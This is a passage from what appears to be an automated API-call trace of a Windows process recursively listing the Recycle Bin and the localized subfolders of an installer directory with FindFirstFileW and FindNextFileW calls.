lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xae73cae3, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="S-1-5-18", cAlternateFileName="")) returned 1 [0195.795] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-18\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xae73cae3, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6043b8 [0195.795] FindNextFileW (in: hFindFile=0x6043b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xae73cae3, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0195.795] FindNextFileW (in: hFindFile=0x6043b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xae73cae3, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0195.795] FindNextFileW (in: hFindFile=0x6043b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xae73cae3, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0195.795] FindClose (in: hFindFile=0x6043b8 | out: hFindFile=0x6043b8) returned 1 [0195.796] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x4021290 | out: hHeap=0x5e0000) returned 1 [0195.796] FindNextFileW (in: hFindFile=0x604378, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x11a5eef8, ftLastAccessTime.dwHighDateTime=0x1d3375b, ftLastWriteTime.dwLowDateTime=0x11a5eef8, ftLastWriteTime.dwHighDateTime=0x1d3375b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="S-1-5-21-1051304884-625712362-2192934891-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0195.796] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x11a5eef8, ftLastAccessTime.dwHighDateTime=0x1d3375b, ftLastWriteTime.dwLowDateTime=0x11a5eef8, ftLastWriteTime.dwHighDateTime=0x1d3375b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x604438 [0195.796] FindNextFileW (in: hFindFile=0x604438, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x11a5eef8, ftLastAccessTime.dwHighDateTime=0x1d3375b, ftLastWriteTime.dwLowDateTime=0x11a5eef8, ftLastWriteTime.dwHighDateTime=0x1d3375b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0195.796] FindNextFileW (in: hFindFile=0x604438, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xcb9438a8, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xcb9438a8, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0195.796] FindNextFileW (in: hFindFile=0x604438, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xcb9438a8, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xcb9438a8, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0195.796] FindClose (in: hFindFile=0x604438 | out: hFindFile=0x604438) returned 1 [0195.796] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x4021290 | out: hHeap=0x5e0000) returned 1 [0195.796] FindNextFileW (in: hFindFile=0x604378, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x11a5eef8, ftLastAccessTime.dwHighDateTime=0x1d3375b, ftLastWriteTime.dwLowDateTime=0x11a5eef8, ftLastWriteTime.dwHighDateTime=0x1d3375b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="S-1-5-21-1051304884-625712362-2192934891-1000", cAlternateFileName="S-1-5-~1")) returned 0 [0195.796] FindClose (in: hFindFile=0x604378 | out: hFindFile=0x604378) returned 1 [0195.796] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x4011288 | out: hHeap=0x5e0000) returned 1 [0195.797] FindNextFileW (in: hFindFile=0x604338, lpFindFileData=0x3cdfcf8 | out: lpFindFileData=0x3cdfcf8*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x85776261, ftCreationTime.dwHighDateTime=0x1d3276f, ftLastAccessTime.dwLowDateTime=0x85776261, ftLastAccessTime.dwHighDateTime=0x1d3276f, ftLastWriteTime.dwLowDateTime=0x85776261, ftLastWriteTime.dwHighDateTime=0x1d3276f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77bb0000, dwReserved1=0x0, cFileName="$WINRE_BACKUP_PARTITION.MARKER", cAlternateFileName="$WINRE~1.MAR")) returned 1 [0195.797] FindNextFileW (in: hFindFile=0x604338, lpFindFileData=0x3cdfcf8 | out: lpFindFileData=0x3cdfcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf39a4e7e, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf74cd515, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77bb0000, dwReserved1=0x0, cFileName="588bce7c90097ed212", cAlternateFileName="588BCE~1")) returned 1 [0195.797] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\*", lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf39a4e7e, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf74cd515, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName=".", cAlternateFileName="")) returned 0x6047f8 [0195.803] FindNextFileW (in: hFindFile=0x6047f8, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf39a4e7e, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf74cd515, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="..", cAlternateFileName="")) returned 1 [0195.804] FindNextFileW (in: hFindFile=0x6047f8, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1025", cAlternateFileName="")) returned 1 [0195.804] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1025\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6047b8 [0195.805] FindNextFileW (in: hFindFile=0x6047b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0195.805] FindNextFileW (in: hFindFile=0x6047b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x1d8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0195.805] FindNextFileW (in: hFindFile=0x6047b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x121e6, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0195.805] FindNextFileW (in: hFindFile=0x6047b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0195.805] FindNextFileW (in: hFindFile=0x6047b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0195.805] FindClose (in: hFindFile=0x6047b8 | out: hFindFile=0x6047b8) returned 1 [0195.805] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0195.805] FindNextFileW (in: hFindFile=0x6047f8, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1028", cAlternateFileName="")) returned 1 [0195.806] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1028\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6049b8 [0195.806] FindNextFileW (in: hFindFile=0x6049b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0195.806] FindNextFileW (in: hFindFile=0x6049b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x18a5, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0195.806] FindNextFileW (in: hFindFile=0x6049b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xed90, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0195.807] FindNextFileW (in: hFindFile=0x6049b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0195.807] FindNextFileW (in: hFindFile=0x6049b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0195.807] FindClose (in: hFindFile=0x6049b8 | out: hFindFile=0x6049b8) returned 1 [0195.807] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0195.807] FindNextFileW (in: hFindFile=0x6047f8, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1029", cAlternateFileName="")) returned 1 [0195.807] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1029\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x604838 [0195.808] FindNextFileW (in: hFindFile=0x604838, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0195.808] FindNextFileW (in: hFindFile=0x604838, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe8e, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0195.808] FindNextFileW (in: hFindFile=0x604838, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13c4a, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0195.808] FindNextFileW (in: hFindFile=0x604838, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0195.809] FindNextFileW (in: hFindFile=0x604838, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0195.809] FindClose (in: hFindFile=0x604838 | out: hFindFile=0x604838) returned 1 [0195.809] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0195.809] FindNextFileW (in: hFindFile=0x6047f8, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1030", cAlternateFileName="")) returned 1 [0195.809] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1030\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6045b8 [0195.908] FindNextFileW (in: hFindFile=0x6045b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0195.913] FindNextFileW (in: hFindFile=0x6045b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xcf2, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0195.913] FindNextFileW (in: hFindFile=0x6045b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12fb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0195.913] FindNextFileW (in: hFindFile=0x6045b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0195.914] FindNextFileW (in: hFindFile=0x6045b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0195.914] FindClose (in: hFindFile=0x6045b8 | out: hFindFile=0x6045b8) returned 1 [0195.914] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0195.914] FindNextFileW (in: hFindFile=0x6047f8, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1031", cAlternateFileName="")) returned 1 [0195.914] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1031\\*", 